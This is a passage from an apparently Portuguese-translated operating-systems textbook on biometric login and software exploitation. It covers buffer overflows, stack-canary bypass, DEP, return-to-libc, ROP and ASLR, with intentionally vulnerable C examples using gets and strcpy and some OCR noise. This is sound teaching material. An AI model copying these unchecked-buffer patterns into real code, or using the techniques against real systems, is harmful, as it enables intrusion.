e fornece um nome de login. Então o sistema toma a 
medida novamente. Se os novos valores casarem com 
aqueles amostrados no momento do cadastramento, o 
login é aceito; de outra maneira, ele é rejeitado. O nome 
do login é necessário porque as medidas jamais são exa- 
tas, então é difícil indexá-las e em seguida pesquisar o 
índice. Além disso, duas pessoas podem ter as mesmas 
características, então exigir que as características men- 
suradas casem com as de um usuário específico torna 
o processo mais rígido do que apenas exigir que elas 
casem com as características de qualquer usuário. 

A característica escolhida deve ter uma variabilida- 
de suficiente para distinguir entre muitas pessoas sem 
erro. Por exemplo, a cor do cabelo não é um bom indi- 
cador, pois tantas pessoas compartilham da mesma cor. 
Também, a característica não deve variar com o tempo 
e com algumas pessoas, pois a cor do cabelo não tem 
essa propriedade. De modo similar, a voz de uma pes- 
soa pode ser diferente por causa de um resfriado e um 
rosto pode parecer diferentes por causa de uma barba ou 
maquiagem que não estavam presentes no momento do 
cadastramento. Dado que amostras posteriores jamais 
casarão com os valores de cadastramento exatamente, 
os projetistas do sistema têm de decidir quão bom um 
casamento tem de ser para ser aceito. Em particular, eles 
têm de decidir se é pior rejeitar um usuário legítimo de 
vez em quando ou deixar que um impostor consiga vio- 
lar o sistema de vez em quando. Um site de comércio 
eletrônico pode decidir que rejeitar um cliente leal pode 
ser pior do que aceitar uma pequena quantidade de frau- 
de, enquanto um site de armas nucleares pode decidir 
que recusar o acesso a um empregado genuíno é melhor 


do que deixar qualquer estranho entrar no sistema duas 
vezes ao ano. 

Agora vamos examinar brevemente algumas das 
biometrias que são de fato usadas. A análise do compri- 
mento dos dedos é surpreendentemente prática. Quando 
isso é usado, cada computador tem um dispositivo como 
o da Figura 9.20. O usuário insere sua mão, e o compri- 
mento de todos os seus dedos é mensurado e conferido 
com o banco de dados. 

As medidas do comprimento dos dedos não são 
perfeitas, no entanto. O sistema pode ser atacado com 
moldes de mão feitos de gesso de Paris ou algum outro 
material, possivelmente com dedos ajustáveis para per- 
mitir alguma experimentação. 

Outra biometria que é usada de maneira ampla co- 
mercialmente é o reconhecimento pela íris. Não exis- 
tem duas pessoas com os mesmos padrões (mesmo 
gêmeos idênticos), então o reconhecimento pela íris é 
tão bom quanto o pelas impressões digitais e mais fá- 
cil de ser automatizado (DAUGMAN, 2004). O sujeito 
apenas olha para a câmera (a uma distância de até um 
metro), que fotografa os seus olhos, extrai determina- 
das características por meio de uma transformação de 
uma ondaleta de gabor e comprime os resultados em 
256 bytes. Essa cadeia é comparada ao valor obtido no 
momento do cadastramento, e se a distância Hamming 
estiver abaixo de algum limiar crítico, a pessoa é auten- 
ticada. (A distância Hamming entre duas cadeias de bits 
é o número mínimo de mudanças necessárias à transfor- 
mação de uma na outra.) 

Qualquer técnica que se baseia em imagens está 
sujeita a fraudes. Por exemplo, uma pessoa poderia 
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aproximar-se do equipamento (digamos, uma câmera 
de máquina ATM) usando óculos escuros aos quais as 
fotografias dos olhos de outra pessoa são coladas. Afi- 
nal de contas, se a câmera da ATM pode tirar uma boa 
foto da iris a 1 metro e distância, outras pessoas podem 
fazê-lo também, e a distâncias maiores usando lentes 
de teleobjetivas. Por essa razão, contramedidas talvez 
sejam necessárias, como fazer a câmera disparar um 
flash, não para fins de iluminação, mas para ver se a 
pupila se contrai em resposta ou para ver se o temido 
efeito de olhos vermelhos do fotógrafo amador apare- 
ce na foto com flash, mas está ausente quando nenhum 
flash é usado. O aeroporto de Amsterdã tem usado a 
tecnologia de reconhecimento de íris desde 2001 para 
os passageiros frequentes não precisarem entrar na fila 
de imigração normal. 

Uma técnica de certa maneira diferente é a análise 
de assinatura. O usuário assina o seu nome com uma ca- 
neta especial conectada ao computador, e o computador 
a compara com uma assinatura conhecida armazenada 
on-line ou em um cartão inteligente. Ainda melhor é 
não comparar a assinatura, e sim os movimentos e pres- 
são feitos enquanto escrevendo. Um bom atacante pode 
ser capaz de copiar a assinatura, mas ele não terá ideia 
de qual a ordem exata na qual os traços foram feitos ou 
em que velocidade e pressão. 

Um esquema que se baseia em uma quantidade míni- 
ma de hardware especial é a biometria de voz (KAMAN 
et al., 2013). Tudo o que é preciso é um microfone (ou 
mesmo um telefone); o resto é software. Em compa- 
ração com os sistemas de reconhecimento de voz, que 
tentam determinar o que a pessoa que está falando está 
dizendo, esses sistemas tentam determinar quem é a 
pessoa. Alguns sistemas simplesmente exigem que o 
usuário diga uma senha secreta, mas esses podem ser 
derrotados por um espião que pode gravar senhas e 
reproduzi-las depois. Sistemas mais avançados dizem 
algo para o usuário e pedem que isso seja repetido de 
volta, com diferentes textos sendo usados para cada lo- 
gin. Algumas empresas estão começando a usar a identi- 
ficação de voz para aplicações como compras a partir de 
casa pelo telefone, pois a identificação de voz é menos 
sujeita a fraude do que usar um código PIN para identi- 
ficação. O reconhecimento de voz pode ser combinado 
com outras biometrias como o reconhecimento de rosto 
para melhor precisão (TRESADERN et al., 2013). 

Poderíamos continuar com mais exemplos, porém 
dois mais ajudarão a provar um ponto importante. Ga- 
tos e outros animais marcam seus territórios urinando 
em torno do seu perímetro. Aparentemente gatos con- 
seguem identificar o cheiro um do outro dessa maneira. 
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Suponha que alguém apareça com um dispositivo mi- 
núsculo capaz de realizar uma análise de urina instanta- 
nea, desse modo fornecendo uma identificação à prova 
de falhas. Cada computador poderia ser equipado com 
um desses dispositivos, junto com um sinal discreto 
lendo: “Para login, favor depositar amostra aqui”. Esse 
sistema poderia ser inviolável, mas ele provavelmente 
teria um problema relativamente sério de aceitação pe- 
los usuários. 

Quando o parágrafo anterior foi incluído em uma ou- 
tra edição deste livro, tinha a intenção de ser pelo me- 
nos em parte uma piada. Não mais. Em um exemplo da 
vida imitando a arte (vida imitando livros didáticos?), 
os pesquisadores desenvolveram agora um sistema de 
reconhecimento de odores que poderia ser usado como 
biometria (RODRIGUEZ-LUJAN et al., 2013). O que 
virá depois disso? 

Também potencialmente problemático é um sistema 
consistindo em uma pequena agulha e um pequeno es- 
pectrógrafo. Seria pedido ao usuário que pressionasse o 
seu polegar contra a agulha, desse modo extraindo uma 
gota de sangue para análise do espectrógrafo. Até o mo- 
mento, ninguém publicou nada a respeito disso, mas 
existem trabalhos sobre a criação de imagens de vasos 
sanguíneos para uso biométrico (FUKSIS et al., 2011). 

Nosso ponto é que qualquer esquema de autentica- 
ção precisa ser psicologicamente aceitável para a comu- 
nidade de usuários. Medidas do comprimento de dedos 
provavelmente não causarão qualquer problema, mas 
mesmo algo não tão invasivo quanto armazenar impres- 
sões digitais on-line pode não ser aceitável para muitas 
pessoas, pois elas associam impressões digitais com cri- 
minosos. Mesmo assim, a Apple introduziu a tecnologia 
no iPhone 5S. 


9.7 Explorando softwares 


Uma das principais maneiras de violar o computador 
de um usuário é explorar as vulnerabilidades no softwa- 
re executando no sistema para fazê-lo realizar algo dife- 
rente do que o programador intencionava. Por exemplo, 
um ataque comum é infectar o navegador de um usuá- 
rio através de um drive-by-download. Nesse ataque, o 
criminoso cibernético infecta o navegador do usuário 
inserindo conteúdos maliciosos em um servidor da web. 
Tão logo o usuário visita o site, o navegador é infectado. 
Às vezes, os servidores da web são completamente con- 
trolados pelos atacantes, que buscam atrair os usuários 
para o seu site na web (enviar spams com promessas 
de softwares gratuitos ou filmes pode ser suficiente). 


No entanto, também é possível que os atacantes colo- 
quem conteúdos maliciosos em um site legítimo (talvez 
nos anúncios, ou em um grupo de discussão). Há pouco 
tempo, o site do time de futebol norte-americano Mia- 
mi Dolphins foi comprometido dessa maneira, poucos 
dias antes de os Dolphins receberem o Super Bowl em 
seu estádio, um dos eventos esportivos mais aguardados 
do ano. Apenas dias antes do evento, o site era extre- 
mamente popular e muitos usuários visitando-o foram 
infectados. Após a infecção inicial em um drive-by- 
download, o código do atacante executando no navega- 
dor baixa o software zumbi real (malware), executa-o e 
certifica-se de que ele sempre seja inicializado quando 
o sistema for inicializado. 

Dado que este é um livro sobre sistemas operacio- 
nais, o foco é sobre como subverter o sistema opera- 
cional. As muitas maneiras como você pode explorar 
defeitos de softwares para atacar sites na web e bancos 
de dados não são cobertas aqui. O cenário típico é que 
alguém descubra um defeito no sistema operacional e 
então encontre uma maneira de explorá-lo para com- 
prometer os computadores que estejam executando o 
código defeituoso. Drive-by-downloads também não 
fazem parte do quadro, mas veremos que muitas das 
vulnerabilidades e falhas nas aplicações de usuário são 
aplicáveis ao núcleo também. 

No famoso livro de Lewis Caroll, Alice através do 
espelho, a Rainha Vermelha leva Alice para uma corri- 
da maluca. Elas correm o mais rápido que podem, mas 
não importa o quão rápido corram, elas sempre ficam no 
mesmo lugar. Isso é esquisito, pensa Alice, e ela externa 
sua opinião. “Em nosso país, você geralmente chegaria 
a algum lugar — se você corresse bem rápido por um 
longo tempo como estamos fazendo”. “Um país lento, 
esse!” — disse a rainha. “Agora, aqui, veja bem, é pre- 
ciso correr tanto quanto você for capaz para ficar no 
mesmo lugar. Se você quiser chegar a outro lugar, terá 
de correr duas vezes mais rápido do que isso!”. 

O efeito da Rainha Vermelha é típico de corridas 
armamentistas evolutivas. No curso de milhões de anos, 
os ancestrais das zebras e dos leões evoluíram. As ze- 
bras tornaram-se mais rápidas e melhores em ver, ouvir 
e farejar predadores — algo útil, se você quiser superar 
os leões na corrida. Mas nesse ínterim, os leões também 
se tornaram mais rápidos, maiores, mais silenciosos e 
mais bem camuflados — algo útil, se você gosta de ze- 
bras. Então, embora tanto o leão quanto a zebra tenham 
“melhorado” seus designs, nenhum dos dois tornou-se 
mais bem-sucedido em ganhar do outro na caçada; am- 
bos ainda existem na vida selvagem. Ainda assim, le- 
ões e zebras estão presos em uma corrida armamentista. 


Eles estão correndo para ficar no mesmo lugar. O efeito 
da Rainha Vermelha também se aplica à exploração de 
programas. Os ataques tornaram-se cada vez mais sofis- 
ticados para lidar com medidas de segurança cada vez 
mais avançadas. 

Embora toda exploração envolva um defeito espe- 
cífico em um programa específico, há várias catego- 
rias gerais de defeitos que sempre ocorrem de novo 
e valem a pena ser estudados para ver como os ata- 
ques funcionam. Nas seções a seguir, examinaremos 
não apenas uma série desses métodos, como também 
contramedidas para cessá-los, e contra contramedidas 
para evitar essas medidas, e mesmo contra contra con- 
tramedidas para contra-atacar esses truques, e assim 
por diante. Isso vai lhe proporcionar uma boa ideia da 
corrida evolutiva entre os atacantes e defensores — e 
como você se sentiria em uma saída para correr com a 
Rainha Vermelha. 

Começaremos nossa discussão com o venerável 
transbordamento do buffer, uma das técnicas de explo- 
ração mais importantes na história da segurança de com- 
putadores. Ele já era usado no primeiríssimo worm da 
internet, escrito por Robert Morris Jr. em 1988, e ainda é 
amplamente usado hoje em dia. Apesar de todas as con- 
tramedidas, os pesquisadores preveem que os transbor- 
damentos de buffers ainda estarão conosco por algum 
tempo (VAN DER VEEN, 2012). Transbordamentos de 
buffers são idealmente adequados para introduzir três 
dos mais importantes mecanismos de proteção dispo- 
níveis na maioria dos sistemas modernos: canários de 
pilha (stack canaries), proteção de execução de dados 
e randomização de layout de espaço de endereçamento. 
Em seguida, examinaremos outras técnicas de explora- 
ção, como ataques a strings de formatação, ataques por 
transbordamento de inteiros e explorações de ponteiros 
pendentes (dangling pointer exploits). 


9.7.1 Ataques por transbordamento de buffer 


Uma fonte rica de ataques tem sido causada pelo fato 
de que virtualmente todos os sistemas operacionais e 
a maioria dos programas de sistemas são escritos em 
linguagens de programação C ou C++ (porque os pro- 
gramadores gostam delas e elas podem ser compiladas 
em códigos objeto extremamente eficientes). Infeliz- 
mente, nenhum compilador C ou C++ faz verificação 
de limites dos vetores. Como um exemplo, a função de 
biblioteca C gets, que lê uma string (de tamanho desco- 
nhecido) em um buffer de tamanho fixo, mas sem con- 
ferir o transbordamento, e conhecida por estar sujeita 
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a esse tipo de ataque (alguns compiladores chegam a 
detectar o uso de gets e avisam a respeito dele). Em con- 
sequência, a sequência de código a seguir também não 
é conferida: 


01. void A() { 


02. char B[128]; /* reservar um buffer com espa- 


co para 128 bytes na pilha */ 
03. printf (“Digitar mensagem de log:”; 
04. gets (B); /* le mensagem de log da entra- 
da padrao para o buffer */ 


05. writeLog (B); /* enviar string em formato atra- 


ente para o arquivo de log */ 
06.) 


A função A representa um procedimento de armaze- 
namento de registros (logging) — de certa maneira sim- 
plificado. Toda vez que a função executa, ela convida o 
usuário a digitar uma mensagem de registro e então lê o 
que quer que o usuário digite no buffer B, usando gets 
da biblioteca C. Por fim, ele chama a função writeLog 
(caseira) que presumivelmente escreve a entrada do log 
em um formato atraente (talvez adicionando a data e o 
horário à mensagem de log para tornar mais fácil a busca 
por ele mais tarde). Presuma que a função A faça parte 
de um processo privilegiado, por exemplo, um programa 
que tem SETUID de root. Um atacante que é capaz de as- 
sumir o controle de um processo desses, essencialmente 
tem privilégios de root para si mesmo. 

O código mostrado tem um defeito importante, em- 
bora ele não seja imediatamente óbvio. O problema é 
causado pelo fato de que gets lê caracteres da entrada 
padrão até encontrar um caractere de uma nova linha. 
Ele não faz ideia de que o buffer B possa conter apenas 
128 bytes. Suponha que o usuário digite uma linha de 
256 caracteres. O que acontece com os 128 bytes res- 
tantes? Tendo em vista que gets não confere se há vio- 
lações de limites, os bytes restantes serão armazenados 
na pilha também, como se o buffer tivesse 256 bytes de 
comprimento. Tudo o que foi originalmente armazena- 
do nesses locais de memória é simplesmente sobrescri- 
to. As consequências são tipicamente desastrosas. 

Na Figura 9.21(a), vemos o programa principal exe- 
cutando, com suas variáveis locais na pilha. Em algum 
ponto ele chama a rotina 4, como mostrado na Figura 
9.21(b). A sequência de chamada padrão começa empi- 
lhando o endereço de retorno (que aponta para a instru- 
ção seguindo a chamada) na pilha. Ela então transfere 
o controle para 4, que reduz o ponteiro da pilha para 
128 para alocar armazenamento para sua variável local 
(buffer B). 
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[FIGURA 9.21] (a) Situação na qual o programa principal está executando. (b) Após a rotina A ter sido chamada. (c) Transbordamento do 


buffer mostrado em cinza. 
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Então o que exatamente vai acontecer se o usuário 
fornecer mais do que 128 caracteres? A Figura 9.21(c) 
mostra essa situação. Como mencionado, a função gets 
copia todos os bytes para e além do buffer, sobrescreven- 
do o endereço de retorno empilhado ali anteriormente. 
Em outras palavras, parte da entrada do log agora enche 
o local de memória que o sistema presume conter o en- 
dereço da instrução para saltar quando a função retor- 
nar. Enquanto o usuário digitar uma mensagem de log 
regular, os caracteres da mensagem provavelmente não 
representariam um código de endereço válido. Tão logo 
a função 4 retornasse, o programa tentaria saltar para 
um alvo inválido — algo que o sistema não apreciaria 
de maneira alguma. Na maioria dos casos, o programa 
cairia imediatamente. 

Agora suponha que esse não seja um usuário benig- 
no que fornece uma mensagem excessivamente longa 
por engano, mas um atacante que fornece uma men- 
sagem sob medida especificamente buscando subver- 
ter o fluxo de controle do programa. Digamos que o 
atacante forneça uma entrada que seja formulada com 
cuidado para sobrescrever o endereço de retorno com 
o endereço do buffer B. O resultado é que, ao retornar 
da função 4, o programa saltará para o começo do buf- 
fer B e executará os bytes no buffer como um código. 
Como o atacante controla o conteúdo do buffer, ele 
pode enchê-lo com as instruções da máquina — para 
executar o código do atacante dentro do contexto do 
programa original. Na realidade, o atacante sobrescre- 
veu a memória com o seu próprio código e conseguiu 
fazê-lo ser executado. O programa agora está comple- 
tamente sob o controle do atacante. Ele pode obrigá-lo 
a realizar o que ele quiser. Muitas vezes, o código do 
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atacante é usado para lançar um shell (por exemplo, por 
meio da chamada de sistema exec), fornecendo ao intruso 
acesso conveniente à máquina. Por essa razão, esse tipo 
de código é comumente conhecido como um código de 
shell (shellcode), mesmo que não gere um shell. 

Esse truque funciona não só para programas usando 
gets (embora você deva de fato evitar usar essa função), 
mas para qualquer código que copie dados fornecidos 
pelo usuário em um buffer sem conferir violações de 
limite. Esses dados de usuário consistem em parâme- 
tros de linha de comando, strings de ambiente, dados 
enviados por uma conexão de rede, ou dados lidos do 
arquivo de um usuário. Há muitas funções que copiam 
ou movem esse tipo de dados: strcpy, memcpy, strcat, e 
muitos outros. É claro, qualquer laço que você mesmo 
escreva e que mova bytes para um buffer pode ser vul- 
nerável também. 

E se um atacante não sabe qual o endereço exato 
para retornar? Muitas vezes um atacante pode adivinhar 
onde o código de shell reside aproximadamente, mas 
não exatamente. Nesse caso, uma solução típica é ane- 
xar antes do código de shell um trenó (sled) de nops: 
uma sequência de instruções NO OPERATION de um 
byte que não fazem coisa alguma. Enquanto o atacante 
conseguir se posicionar em qualquer parte no trenó de 
nops, a execução eventualmente chegará ao código de 
shell real ao fim. Trenós de nops funcionam na pilha, 
mas também no heap. No heap, atacantes muitas vezes 
tentam aumentar suas chances colocando trenós de nops 
e códigos shell por todo o heap. Por exemplo, em um 
navegador, códigos JavaScript maliciosos podem tentar 
alocar a maior quantidade de memória que conseguirem 
e enchê-la com um longo trenó de nops e uma pequena 


quantidade de código de shell. Então, se o atacante con- 
seguir desviar o fluxo de controle e buscar um endereço 
de heap aleatório, as chances são de que ele atingirá o 
trenó de nops. Essa técnica é conhecida como pulveri- 
zação do heap (heap spraying). 


Canários de pilha (stack canaries) 


Uma defesa comumente usada contra o ataque de- 
lineado é usar canários de pilha. O nome é derivado 
da profissão dos mineiros. Trabalhar em uma mina é 
um trabalho perigoso. Gases tóxicos como o monó- 
xido de carbono podem se acumular e matar os mi- 
neiros. Além disso, o monóxido de carbono não tem 
cheiro, então os mineradores talvez nem o percebam. 
No passado, mineradores traziam canários para a 
mina como um sistema de alarme. Qualquer aumento 
de gases tóxicos mataria o canário antes de intoxicar 
o seu dono. Se o seu pássaro morresse, provavelmente 
era melhor dar o fora. 

Sistemas de computadores modernos usam caná- 
rios (digitais) como sistemas de aviso iniciais. A ideia 
é muito simples. Em lugares onde o programa faz uma 
chamada de função, o compilador insere o código para 
salvar um valor de canário aleatório na pilha, logo abai- 
xo do endereço de retorno. Ao retornar de uma função, 
o compilador insere o código para conferir o valor do 
canário. Se o valor mudou, algo está errado. Nesse caso, 
é melhor apertar o botão de pânico e derrubar o progra- 
ma do que seguir em frente. 


Evitando canários de pilha 


Canários funcionam bem contra ataques como o des- 
crito, mas muitos transbordamentos de buffer ainda são 
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possíveis. Por exemplo, considere o fragmento de códi- 
go na Figura 9.22. Ele usa duas funções novas. O strcpy 
é uma função de biblioteca C para copiar uma string em 
um buffer, enquanto o strlen determina o comprimento 
da string. 

Como no exemplo anterior, a função 4 lê uma men- 
sagem de log da entrada padrão, mas dessa vez ela a 
pré-confina explicitamente com a data atual (fornecida 
como um argumento de string para a função 4). Pri- 
meiro, ela copia a data na mensagem de log (linha 6). 
A string data pode ter um comprimento diferente, de- 
pendendo do dia da semana, do mês etc. Por exemplo, 
sexta-feira tem 10 letras, mas sábado 6. A mesma coisa 
para os meses. Então, a segunda coisa que ela faz é de- 
terminar quantos caracteres estão na string data (linha 
7). Em seguida ela pega a entrada do usuário (linha 5) 
e a cópia na mensagem do log, começando logo após a 
string data. Ele faz isso especificando que o destino da 
cópia deve ser o começo da mensagem do log mais o 
comprimento da string data (linha 9). Por fim, ele escre- 
ve o log para discar como antes. 

Vamos supor que o sistema use canários de pilha. 
Como poderíamos possivelmente mudar o endereço de 
retorno? O truque é que quando o atacante transborda 
o buffer B, ele não tenta atingir o endereço de retorno 
imediatamente. Em vez disso, ele modifica a variável 
len que está localizada logo acima sobre a pilha. Na li- 
nha 9, /en serve como uma compensação que determina 
onde os conteúdos do buffer B serão escritos. A ideia do 
programador era pular apenas uma string data, mas já 
que o atacante controla /en, ele pode usá-lo para pular o 
canário e sobrescrever o endereço de retorno. 

Além disso, transbordamentos de buffer não são limi- 
tados ao endereço de retorno. Qualquer ponteiro de fun- 
ção que seja alcançável via um transbordamento serve 
como alvo. Um ponteiro de função é simplesmente como 


(FIGURA 9.22] Pulando o canário de pilha: modificando len primeiro, o ataque é capaz de evitar o canário e modificar o endereço de 


retorno diretamente. 


01. void A (char *data) { 
02. intlen; 

03. charB[128]; 

04. char logMsg [256]; 
05. 

06. strcpy (logMsg, data); 
07. len = strlen (data); 
08. gets (B); 

09. strcpy (logMsg+len, B); 
10. writeLog (logMsg); 
11.} 


/* primeiro copia a string com a data na Mensagem de log */ 
/* determina o numero de caracteres estao em data */ 

/* agora recebe a mensagem de verdade */ 

/* e a copia apos a data no logMsg */ 

/* por fim, escreve a mensagem de log para o disco */ 
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um ponteiro regular, exceto que ele aponta para uma fun- 
ção em vez de dados. Por exemplo, C e C++ permitem 
que um programador declare uma variável f como um 
ponteiro para uma função que recebe uma string como 
argumento e retorna o resultado, como a seguir: 


void (*f)(char*); 


A sintaxe talvez seja um pouco arcana, mas ela é 
realmente apenas outra declaração de variável. Como 
a função 4 do exemplo anterior casa com a assinatura 
acima, podemos agora escrever “f = A” e usar fem vez 
de 4 em nosso programa. Está além do escopo deste 
livro aprofundar a questão de ponteiros de função, mas 
pode ter certeza de que ponteiros de função são bastante 
comuns em sistemas operacionais. Agora suponha que 
o atacante consiga sobrescrever um ponteiro de função. 
Tão logo o programa chama a função usando o ponteiro 
de função, ele na realidade chamaria o código injetado 
pelo atacante. Para a exploração funcionar, o ponteiro de 
função não precisa nem estar na pilha. Ponteiros de fun- 
ção no heap são tão úteis quanto. Desde que o atacante 
possa mudar o valor de um ponteiro de função ou um 
endereço de retorno para o buffer que contém o código 
do atacante, ele é capaz de mudar o fluxo de controle do 
programa. 


Prevenção de execução de dados 


Talvez a esta altura você possa exclamar: “Espere 
aí! A causa real do problema não é que o atacante é ca- 
paz de sobrescrever ponteiros de função e endereços de 
retorno, mas o fato de ele poder injetar códigos e tê- 
-los executados. Por que não tornar impossível executar 
bytes no heap ou na pilha?”. Se isso ocorreu, você teve 
uma grande ideia. No entanto, veremos brevemente que 
grandes ideias nem sempre impedem os ataques por 
transbordamento do buffer. Ainda assim a ideia é muito 
boa. Ataques por injeção de códigos não funcionarão 
mais se os bytes fornecidos pelo atacante não puderem 
ser executados como códigos legítimos. 

CPUs modernas têm uma característica que é popu- 
larmente referida como o bit NX, para “Não eXecutar”. 
Ele é extremamente útil para distinguir entre segmentos 
de dados (heap, pilha e variáveis globais) e o segmen- 
to de texto (que contém o código). Especificamente, 
muitos sistemas operacionais modernos tentam assegu- 
rar que seja possível escrever nos segmentos de dados, 
mas não executá-los, e que o segmento de texto seja 
executável, mas não seja possível escrever nele. Essa 
política é conhecida em OpenBSD como W^X (pro- 
nunciado como “WExclusive-OR XZ” ou “W XOR X”). 


Ela significa que ou a memória pode ser escrita ou ela 
pode ser executável, mas não ambos. Mac OS X, Linux 
e Windows têm esquemas de proteção similares. Um 
nome genérico para essa medida de segurança é DEP 
(Data Execution Prevention — Prevenção de Execu- 
ção de Dados). Alguns hardwares não suportam o bit 
NX. Nesse caso, DEP ainda funciona, mas sua imposi- 
ção ocorre no software. 

DEP evita todos os ataques discutidos até o momen- 
to. O atacante pode injetar todo código de shell que ele 
quiser no processo. A não ser que ele consiga tornar a 
memória executável, não há como executá-la. 


Ataques de reutilização de código 


DEP torna impossível executar códigos em regiões 
de dados. Canários de pilhas tornam mais difícil (mas 
não impossível) sobrescrever endereços de retorno e 
ponteiros de funções. Infelizmente, esse não é o fim 
da história, porque, em algum momento, outra pessoa 
teve uma grande ideia. O insight foi mais ou menos 
como a seguir: “Por que injetar código quando já há 
suficiente dele no código?”. Em outras palavras, em 
vez de introduzir um novo código, o atacante simples- 
mente constrói a funcionalidade necessária a partir das 
funções e instruções existentes nos binários e biblio- 
tecas. Primeiro examinaremos o mais simples desses 
ataques, retorno à libc, e então discutiremos a mais 
complexa, mas muito popular, técnica de programa- 
ção orientada a retornos. 

Suponha que o transbordamento de buffer da Figu- 
ra 9.22 sobrescreveu o endereço de retorno da função 
atual, mas não pode executar o código fornecido pelo 
atacante na pilha. A questão é: ele pode retornar em ou- 
tra parte? Pelo visto pode. Quase todos os programas C 
são ligados com a biblioteca libe (normalmente com- 
partilhada), que contém as funções chave que a maioria 
dos programas C precisa. Uma dessas funções é system, 
que toma uma string como argumento e a passa para 
a shell para execução. Desse modo, usando a função 
system, um atacante pode executar o programa que ele 
quiser. Então, em vez de executar o código de shell, o 
atacante apenas coloca uma string contendo o comando 
para executar na pilha, e desvia o controle para a função 
system através do endereço de retorno. 

O ataque é conhecido como retorno à libe e tem di- 
versas variantes. System não é a única função que pode 
ser interessante para o atacante. Por exemplo, atacantes 
talvez também usem a função mprotect para fazer par- 
te do segmento de dados executável. Além disso, em 
vez de saltar para a função libc diretamente, o ataque 


pode usar um nível de indireção. No Linux, por exemplo, 
o atacante pode retornar ao PLT (Procedure Linkage 
Table — Tabela de Ligação de Rotinas) em vez disso. 
A PLT é uma estrutura para tornar a ligação dinâmica 
mais fácil, e contém fragmentos de código que, quando 
executados, por sua vez, chamam as funções de biblio- 
tecas ligadas dinamicamente. Retornando a esse código, 
então executa indiretamente a função de biblioteca. 

O conceito de ROP (Return-Oriented Program- 
ming — Programação Orientada a Retornos) toma a 
ideia da reutilização do código do programa para seu 
extremo. Em vez de retornar para as funções de biblio- 
teca (seus pontos de entrada), o atacante pode retornar 
a qualquer instrução no segmento de texto. Por exem- 
plo, ele pode fazer o código cair no meio, em vez de no 
início, de uma função. A execução apenas continuará 
nesse ponto, uma instrução de cada vez. Digamos que 
após um punhado de instruções, a execução encontra 
outra instrução de retorno. Agora, fazemos a mesma 
pergunta novamente: para onde podemos retornar? 
Como o atacante tem controle sobre a pilha, ele pode 
mais uma vez fazer o código retornar para qualquer 
lugar que ele quiser. Além disso, após ter feito isso 
duas vezes, ele pode fazê-lo sem problema algum três 
vezes, ou quatro, ou dez etc. 

Assim, o truque da programação orientada para o 
retorno é procurar por pequenas sequências de códi- 
go que (a) façam algo útil e (b) terminem com uma 


(cia EFE] Programação orientada a retornos: ligando maquinetas. 





instr 4 

instr 3 

instr 2 

maquineta C instr 1 
(parte da função Z) 


maquineta B instr 1 
(parte da função Y) 


instr 4 


instr 3 


maquineta A 
(parte da função X) 





Segmento de texto 
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instrução de retorno. O atacante pode conectar essas 
sequências através dos endereços de retorno que ele 
colocou na pilha. Os fragmentos são chamados de 
maquinetas (gadgets). Tipicamente, eles têm uma 
funcionalidade muito limitada, como adicionar dois 
registros, carregar um valor da memória em um regis- 
trador, ou empilhar um valor na pilha. Em outras pala- 
vras, a coleção de maquinetas pode ser vista como um 
conjunto de instruções muito estranho que o atacante 
pode usar para construir uma funcionalidade arbitrária 
através da manipulação inteligente da pilha. O pontei- 
ro da pilha, enquanto isso, serve como um tipo ligeira- 
mente bizarro de contador de programa. 

A Figura 9.23(a) mostra um exemplo de como ma- 
quinetas são ligadas por endereços de retorno da pilha. 
As maquinetas são fragmentos de código curtos que ter- 
minam com uma instrução de retorno. A instrução de 
retorno irá desempilhar o endereço de retorno da pilha 
e continuar a execução ali. Nesse caso, o atacante pri- 
meiro retorna à maquineta A em alguma função X, então 
à maquineta B na função Y etc. Cabe ao atacante reunir 
essas maquinetas em um binário existente. Como não 
foi ele mesmo que criou as maquinetas, às vezes tem de 
se virar com maquinetas que talvez não sejam ideais, 
mas boas o suficiente para o trabalho. Por exemplo, a 
Figura 9.23(b) sugere que a maquineta 4 tem uma con- 
ferência como parte da sequência de instruções. O ata- 
cante pode não se preocupar de maneira alguma com 


Pilha 





Exemplos de maquinetas: 


Maquineta A: 

- desempilha operando e coloca no registrador 1 

- Se o valor for negativo, pula para o tratador de erros 
- Caso contrário, retorne 


Maquineta B: 
- desempilha operando e coloca no registrador 2 
- retorna 


Maquineta C: 

- multiplica registrador 1 por 4 

- empilha registrador 1 

- soma registrador 2 ao valor no topo da pilha e 
armazena o resultado no registrador 2 
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isso, mas já que ele está ali, terá de aceitá-lo. Para a 
maioria dos propósitos, ele talvez seja suficiente para 
inserir qualquer número não negativo no registro 1. A 
maquineta seguinte insere qualquer valor da pilha no 
registrador 2, e o terceiro multiplica o registrador 1 por 
4, empilha-o e o adiciona ao registrador 2. Combinar 
essas três maquinetas resulta em algo que o atacante 
pode usar para calcular o endereço de um elemento em 
um arranjo de inteiros. O índice no arranjo é forneci- 
do pelo primeiro valor de dados na pilha, enquanto o 
endereço base do arranjo deve ser o segundo valor de 
dados. 

A programação orientada a retornos pode parecer 
muito complicada, e talvez seja. Mas, como sempre, as 
pessoas desenvolveram ferramentas para automatizar o 
máximo possível. Os exemplos incluem colhedores de 
gadgets e mesmo compiladores de ROP. Hoje, ROP é 
uma das técnicas de exploração mais importantes usa- 
das mundo afora. 


Randomização de layout endereço-espaço 


A seguir outra ideia para parar com esses ataques. 
Além de modificar o endereço de retorno e injetar 
algum programa (ROP), o atacante deve ser capaz 
de retornar exatamente para o endereço certo — com 
ROP, trenós de nops não são possíveis. Isso é facil, 
se os endereços forem fixos, mas e se eles não forem”? 
ASLR (Address Space Layout Randomization — 
Randomização de layout de espaço de endereça- 
mento) busca randomizar os endereços de funções e 
dados entre cada execução do programa. Como re- 
sultado, torna-se muito mais difícil para o atacante 
explorar o sistema. Especificamente, ASLR muitas 
vezes randomiza as posições da pilha inicial, o heap 
e as bibliotecas. 

Como os canários e DEP, muitos sistemas operacio- 
nais modernos dão suporte ao ASLR, mas muitas vezes 
em granularidades diferentes. A maioria deles os for- 
nece para aplicações do usuário, mas apenas alguns se 
aplicam consistentemente também ao próprio núcleo do 
sistema operacional (GIUFFRIDA et al., 2012). A força 
combinada desses três mecanismos de proteção levan- 
tou significativamente a barra para os atacantes. Apenas 
saltar para o código injetado ou mesmo para alguma 
função existente na memória tornou-se uma tarefa difi- 
cil. Juntos, eles formam uma linha de defesa importante 
em sistemas operacionais modernos. O que é especial- 
mente interessante a respeito deles é que eles oferecem 
sua proteção a um custo muito razoável em relação ao 
desempenho. 


Evitando a ASLR 


Mesmo com todas as três defesas capacitadas, os 
atacantes ainda conseguem explorar o sistema. Há vá- 
rios pontos fracos na ASLR que permitem que múlti- 
plos intrusos a evitem. O primeiro ponto fraco é que a 
